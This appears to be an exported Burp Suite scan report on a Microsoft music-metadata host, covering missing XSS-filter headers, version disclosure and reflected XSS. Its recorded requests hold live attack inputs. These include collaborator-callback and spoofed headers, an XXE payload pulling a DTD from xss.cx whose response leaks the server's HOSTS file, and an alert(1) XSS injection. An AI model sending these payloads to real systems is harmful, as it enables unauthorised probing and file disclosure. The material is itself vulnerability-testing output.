Referer: http://6qxf9aurommsr1gfsimu43fyspygtfp3e.burpcollaborator.net/ref
X-Real-IP: spoofed.av9jeezvtqrww5ljxmry97k2xt3kyjv7k.burpcollaborator.net
True-Client-IP: spoofed.d1fmkh5yztxz28rm3px1faq53w9n4m3as.burpcollaborator.net

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 04 Sep 2017 19:51:52 GMT
Connection: close
Content-Length: 1245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

10. Browser cross-site scripting filter misconfiguration
Previous Next

There are 5 instances of this issue:

/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c/getmdrcd.aspx
/cdinfo/GetMDRCDPOSTURL.aspx
/cdinfo/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c
/cdinfo/getmdrcd.aspx
/favicon.ico

Issue background

Cross-site scripting (XSS) filters in browsers check if the URL contains possible harmful XSS payloads and if they are reflected in the response page. If such a condition is recognized, the injected code is changed in a way, that it is not executed anymore to prevent a succesful XSS attack. The downside of these filters is, that the browser has no possibility to distinguish between code fragments which were reflected by a vulnerable web application in an XSS attack and these which are already present on the page. In the past, these filters were used by attackers to deactivate JavaScript code on the attacked web page. Sometimes the XSS filters itself are vulnerable in a way, that web applications which were protected properly against XSS attacks became vulnerable under certain conditions.

Remediation background

It is considered as better practice to instruct the browser XSS filter to never render the web page if an XSS attack is detected.

10.1. http://info.music.metaservices.microsoft.com/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c/getmdrcd.aspx
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Additional Scanner Checks.

Issue detail

No X-XSS-Protection header was set in the response. This means that the browser uses default behaviour that detection of a cross-site scripting attack never prevents rendering.

Remediation detail

The following header should be set:

X-XSS-Protection: 1; mode=block

Request 1

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 08 Sep 2017 18:23:03 GMT
Connection: close
Content-Length: 11

Bad Request

10.2. http://info.music.metaservices.microsoft.com/cdinfo/GetMDRCDPOSTURL.aspx
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/GetMDRCDPOSTURL.aspx

Note: This issue was generated by the Burp extension: Additional Scanner Checks.

Issue detail

No X-XSS-Protection header was set in the response. This means that the browser uses default behaviour that detection of a cross-site scripting attack never prevents rendering.

Remediation detail

The following header should be set:

X-XSS-Protection: 1; mode=block

Request 1

Response 1

10.3. http://info.music.metaservices.microsoft.com/cdinfo/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

Note: This issue was generated by the Burp extension: Additional Scanner Checks.

Issue detail

No X-XSS-Protection header was set in the response. This means that the browser uses default behaviour that detection of a cross-site scripting attack never prevents rendering.

Remediation detail

The following header should be set:

X-XSS-Protection: 1; mode=block

Request 1

Response 1

10.4. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Additional Scanner Checks.

Issue detail

No X-XSS-Protection header was set in the response. This means that the browser uses default behaviour that detection of a cross-site scripting attack never prevents rendering.

Remediation detail

The following header should be set:

X-XSS-Protection: 1; mode=block

Request 1

Response 1

10.5. http://info.music.metaservices.microsoft.com/favicon.ico
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/favicon.ico

Note: This issue was generated by the Burp extension: Additional Scanner Checks.

Issue detail

No X-XSS-Protection header was set in the response. This means that the browser uses default behaviour that detection of a cross-site scripting attack never prevents rendering.

Remediation detail

The following header should be set:

X-XSS-Protection: 1; mode=block

Request 1

Response 1

11. Software Version Numbers Revealed
Previous Next

There are 6 instances of this issue:

/
/
/
/cdinfo/GetMDRCDPOSTURL.aspx
/cdinfo/getmdrcd.aspx
/favicon.ico

11.1. http://info.music.metaservices.microsoft.com/
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/

Note: This issue was generated by a Burp extension.

Issue detail

The server software versions used by the application are revealed by the web server.
Displaying version information of software information could allow an attacker to determine which vulnerabilities are present in the software, particularly if an outdated software version is in use with published vulnerabilities.

The following software appears to be in use:

Microsoft HTTPAPI: 2.0

Request 1

GET / HTTP/1.1
Host: info.music.metaservices.microsoft.com:80@lynnyevqjcjncsu0tc05h3s02r8iwjkca00nqbf.burpcollaborator.net
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 15 Sep 2018 13:34:27 GMT
Connection: close
Content-Length: 334

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Bad Request - Invalid Hostname</h2>
<hr><p>HTTP Error 400. The request hostname is invalid.</p>
</BODY></HTML>

11.2. http://info.music.metaservices.microsoft.com/
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/

Note: This issue was generated by a Burp extension.

Issue detail

Microsoft IIS: 7.5

Request 1

GET http://x97z9q62uouzn45c4obhsf3cd3ju7vvnzbpyfm4.burpcollaborator.net/ HTTP/1.1
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 15 Sep 2018 13:34:32 GMT
Connection: close
Content-Length: 1233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

11.3. http://info.music.metaservices.microsoft.com/
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/

Note: This issue was generated by a Burp extension.

Issue detail

Microsoft IIS: 7.5

Request 1

GET http://k0lm0dxplblmerwzvb24j2uz4qaryhm9qxgk68v.burpcollaborator.net/?zs7p04=1 HTTP/1.1
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 05 Mar 2019 19:27:20 GMT
Connection: close
Content-Length: 1233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

11.4. http://info.music.metaservices.microsoft.com/cdinfo/GetMDRCDPOSTURL.aspx
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/GetMDRCDPOSTURL.aspx

Note: This issue was generated by the Burp extension: Software Version Reporter.

Issue detail

Microsoft IIS: 7.5

ASP.Net: 2.0.50727

Request 1

GET /cdinfo/GetMDRCDPOSTURL.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=8514A3A2-4452-444A-AA1F-FB970A06A519 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@xde636iu06uz2fjzipfb53om0d6699xy.burpcollaborator.net
Accept-Encoding: gzip, deflate
Host: info.music.metaservices.microsoft.com
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://xrs6h6wue68zgfxzwptbj32medk6n1bq.burpcollaborator.net/ref
X-Real-IP: spoofed.jreshswges8lg1xlwbtxjp28ezksnobd.burpcollaborator.net
Forwarded: for=spoofed.w2z5s57tp5jyre8y7o4au2dlpcv5y2mr.burpcollaborator.net;by=spoofed.w2z5s57tp5jyre8y7o4au2dlpcv5y2mr.burpcollaborator.net;host=spoofed.w2z5s57tp5jyre8y7o4au2dlpcv5y2mr.burpcollaborator.net
X-Forwarded-For: spoofed.hi3q8qne5qzj7zojn9kvant65xbqeo2d.burpcollaborator.net
Contact: root@uom3e3trb35wdcuwtmq8g0zjbah3k28r.burpcollaborator.net
From: root@d3hmtm8aqmkfsv9f855rvje2qtwmzmnb.burpcollaborator.net
True-Client-IP: spoofed.y217s77vp7j0rg807q4cu4dnpev7y8mx.burpcollaborator.net
X-Wap-Profile: http://6szfifx3ff98hoy8xyukkc3vfmlfohc6.burpcollaborator.net/wap.xml
Client-ip: spoofed.ivhrlr0firckk01k0axwno67iyorrvfk.burpcollaborator.net

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 03 Sep 2017 23:33:34 GMT
Connection: close
Content-Length: 168

http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=8514A3A2-4452-444A-AA1F-FB970A06A519

11.5. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Software Version Reporter.

Issue detail

Microsoft IIS: 7.5

ASP.Net: 2.0.50727

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 196
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close

<!DOCTYPE doc [
<!ELEMENT doc ANY>
<!ENTITY % iso-lat1 PUBLIC "ISO 8879:1986//ENTITIES Added Latin 1//EN//XML" "http://xss.cx/music-4.dtd"> %iso-lat1;]>
<doc>
"%e1;%e2;"
</doc>
<METADATA>

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 26 Dec 2017 16:22:20 GMT
Connection: close

<METADATA><mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC</mdqRequestID><ResponseCode>Error: Parse Error</ResponseCode><ResponseCode>Fragment identifier '# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a ' cannot be part of the system identifier 'https://xss.cx/?# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '. Line 12, position -504.</ResponseCode><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

11.6. http://info.music.metaservices.microsoft.com/favicon.ico
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/favicon.ico

Note: This issue was generated by a Burp extension.

Issue detail

Microsoft IIS: 7.5

Request 1

GET /favicon.ico?woquqzr43=1 HTTP/1.1
Host: info.music.metaservices.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: TOptOut=1; optimizelyEndUserId=oeu1542310347452r0.07509970814632028; MC1=GUID=57db598d91304a6caf4594bf6838dd04&HASH=57db&LV=201811&V=4&LU=1542310351857; LPVID=gyZDFjYTNhYTAyNWUxNTI4; MUID=08E3D758211C6CEC153CDBF0251C6F8A; _mkto_trk=id:985-FGW-558&token:_mch-microsoft.com-1542310363187-60614; ak_bmsc=2C0751A2B06AB752D2A0162FE18A9E01172F91CCA66F00009439735C4225FB7A~plIq9Wu7A6sPdvC6122nxpQ5iX4QZT7LzOgiVZvt/OQLT/c9Mf5qvj37PDUVEUMLa/WmCZP/lg50DiXF9bxTW3Ho4iCpXzhDYFr5/OsdsPhOEsFR3QRiqcMQJtskw+77sIJ5QaRK0hd/WVWCEAowptksJwQp0RVXxzbSNhzDT1DmoRHFe5BIMbO1pn8LuzHG2CPl7I7khacenrtrF8ss3pTJsrt1iP+DjANBkzg7CpYyk=

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 25 Feb 2019 00:43:33 GMT
Connection: close
Content-Length: 1245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

12. Cross-site scripting (reflected)
Previous Next

There are 2 instances of this issue:

/cdinfo/getmdrcd.aspx [manual insertion point 1]
/cdinfo/getmdrcd.aspx [requestID parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality that it contains, and the other applications that belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain that can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization that owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organization in order to capture credentials for other applications that it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content that it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

References

Vulnerability classifications

12.1. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [manual insertion point 1]
Previous Next

Summary

	Severity:	Information
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Issue detail

The value of manual insertion point 1 is copied into the XML document as plain text between tags. The payload m5lke<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>lr9i3pnsrcr was submitted in the manual insertion point 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page. To test the proof-of-concept attack, right click on the issue request and choose "Generate CSRF PoC" from the context menu, then click "Test in browser", and paste the resulting URL into a Firefox browser that is configured to use Burp as its proxy.

The original request used a Content-type header which it is not possible to generate using a standard HTML form. It was possible to replace this header with a standard value, to facilitate cross-domain delivery of an exploit.

The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC&requestid=wrtqvetcm5lke%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(1)'%2f%3e%3c%2fa%3elr9i3pnsrcr&guhpem18=1&t2bk8=1&sru9xawdeh0=1 HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 152
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "\\localhost\IPC$" >]>
<foo>&xxe;</foo>

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Dec 2018 19:24:36 GMT
Connection: close

<METADATA><mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC,wrtqvetcm5lke<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>lr9i3pnsrcr</mdqRequestID><ResponseCode>Error: Query String has a bad format.</ResponseCode><ResponseCode>Guid should contain 32 digits with 4 dashes (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx).</ResponseCode><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

12.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [requestID parameter]
Previous Next

Summary

	Severity:	Information
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Issue detail

The value of the requestID request parameter is copied into the XML document as plain text between tags. The payload v2z4i<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>u0unconqjbn was submitted in the requestID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page. To test the proof-of-concept attack, right click on the issue request and choose "Generate CSRF PoC" from the context menu, then click "Test in browser", and paste the resulting URL into a Firefox browser that is configured to use Burp as its proxy.

The original request used a Content-type header which it is not possible to generate using a standard HTML form. It was possible to replace this header with a standard value, to facilitate cross-domain delivery of an exploit.

The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=FF34CE75-F501-425D-9875-22E0448CCF04v2z4i%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(1)'%2f%3e%3c%2fa%3eu0unconqjbn HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@c3gltl89qlkesu9e845qvie1qswnsqgf.burpcollaborator.net
Content-type: text/plain
Accept-Encoding: gzip, deflate
Content-Length: 15236
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://em4ncnrb9n3gbwsgr6osekx39ufpbkz9.burpcollaborator.net/ref
X-Real-IP: spoofed.b3fktk88qkkdst9d835pvhe0qrwmsig7.burpcollaborator.net
Forwarded: for=spoofed.7rzghgw4eg89gpx9wztljd2wenkigf44.burpcollaborator.net;by=spoofed.7rzghgw4eg89gpx9wztljd2wenkigf44.burpcollaborator.net;host=spoofed.7rzghgw4eg89gpx9wztljd2wenkigf44.burpcollaborator.net
X-Forwarded-For: spoofed.j8ssysdgvsplx1eldbax0pj8vz1uxslh.burpcollaborator.net
Contact: root@bydkok38lkfdnt4d330pqh90lrrmnlba.burpcollaborator.net
From: root@axbjnj27kjecms3c22zopg8zkqqlmlaa.burpcollaborator.net
True-Client-IP: spoofed.wss5i5xtf59yheyyxouak23lfcl7h85x.burpcollaborator.net
X-Wap-Profile: http://gl5pbpqd8p2iayriq8nudmw58weratyi.burpcollaborator.net/wap.xml
Client-ip: spoofed.4pudfdu1cd66emv6uwriha0tckifej28.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>FF34CE75-F501-425D-9875-22E0448CCF04</mdqRequestID>
<album>
<title>
<text>Dick's Picks, Vol. 10: Winterland Arena, San Francisco, CA 12/29/77</text>
<word>Dicks</word>
<word>Picks</word>
<word>Vol</word>
<word>10</word>
<word>Winterland</word>
<word>Arena</word>
<word>San</word>
<word>Francisco</word>
<word>CA</word>
<word>12</word>
<word>29</word>
<word>77</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
</album>
<track>
<title>
<text>Jack Straw</text>
<word>Jack</word>
<word>Straw</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>1-01 Jack Straw.m4a</filename>
<trackDuration>425877</trackDuration>
<bitrate>265760</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
<track>
<title>
<text>Bertha</text>
<word>Bertha</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>2-01 Bertha.m4a</filename>
<trackDuration>441620</trackDuration>
<bitrate>270320</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>9</trackRequestID>
</track>
<track>
<title>
<text>Terrapin Station</text>
<word>Terrapin</word>
<word>Station</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>3-01 Terrapin Station.m4a</filename>
<trackDuration>629121</trackDuration>
<bitrate>267344</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>19</trackRequestID>
</track>
<track>
<title>
<text>They Love Each Other</text>
<word>They</word>
<word>Love</word>
<word>Each</word>
<word>Other</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>1-02 They Love Each Other.m4a</filename>
<trackDuration>465002</trackDuration>
<bitrate>265704</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>1</trackRequestID>
</track>
<track>
<title>
<text>Good Lovin'</text>
<word>Good</word>
<word>Lovin</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>2-02 Good Lovin'.m4a</filename>
<trackDuration>410668</trackDuration>
<bitrate>264640</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>10</trackRequestID>
</track>
<track>
<title>
<text>Johnny B. Goode</text>
<word>Johnny</word>
<word>B</word>
<word>Goode</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>3-02 Johnny B. Goode.m4a</filename>
<trackDuration>273995</trackDuration>
<bitrate>263176</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>20</trackRequestID>
</track>
<track>
<title>
<text>Mama Tried</text>
<word>Mama</word>
<word>Tried</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>1-03 Mama Tried.m4a</filename>
<trackDuration>228623</trackDuration>
<bitrate>262224</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>2</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>2-03 Playing In the Band.m4a</filename>
<trackDuration>948186</trackDuration>
<bitrate>267000</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>11</trackRequestID>
</track>
<track>
<title>
<text>Estimated Prophet</text>
<word>Estimated</word>
<word>Prophet</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>3-03 Estimated Prophet.m4a</filename>
<trackDuration>646698</trackDuration>
<bitrate>263896</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>21</trackRequestID>
</track>
<track>
<title>
<text>Loser</text>
<word>Loser</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>1-04 Loser.m4a</filename>
<trackDuration>509956</trackDuration>
<bitrate>262912</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>3</trackRequestID>
</track>
<track>
<title>
<text>China Cat Sunflower</text>
<word>China</word>
<word>Cat</word>
<word>Sunflower</word>
</title>
<artist>
